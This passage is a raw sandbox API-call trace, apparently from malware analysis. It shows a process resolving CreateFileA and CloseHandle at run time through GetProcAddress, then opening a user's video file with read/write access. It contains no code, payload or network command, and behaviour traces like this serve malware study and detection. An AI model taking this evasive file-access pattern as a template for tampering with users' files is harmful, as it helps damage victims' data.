lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0197.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.158] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0197.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0197.158] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba2e8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0197.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.158] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0197.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.158] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.158] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0197.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", cchWideChar=92, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 92 [0197.159] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5c) returned 0x9a5de0 [0197.159] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", cchWideChar=92, lpMultiByteStr=0x9a5de0, cbMultiByte=92, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi", lpUsedDefaultChar=0x0) returned 92 [0197.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5de0 | out: hHeap=0x8a0000) returned 1 [0197.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0197.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0197.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0197.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.159] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.160] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\e1y-mggtzczzg\\9e bcelv9odp5iit.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0197.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0197.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.160] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0197.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0197.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0197.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0197.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=92, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0197.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb8) returned 0x8fabc0 [0197.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=92, lpWideCharStr=0x8fabc0, cchWideChar=92 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\9e BCelV9odP5IiT.avi") returned 92 [0197.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0197.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fabc0 | out: hHeap=0x8a0000) returned 1 [0197.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.162] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.162] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0197.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0197.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0197.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0197.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0197.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0197.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0197.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0197.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0197.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0197.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0197.165] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.165] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.166] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0197.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0197.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0197.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0197.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0197.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.167] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0197.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0197.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0197.168] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0197.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0197.168] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.168] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0197.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0197.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0197.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0197.169] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.169] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.169] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0197.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0197.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0197.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.170] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd720 [0197.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd720, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0197.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0197.170] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0197.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0197.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0197.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0197.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.171] CloseHandle (hObject=0x160) 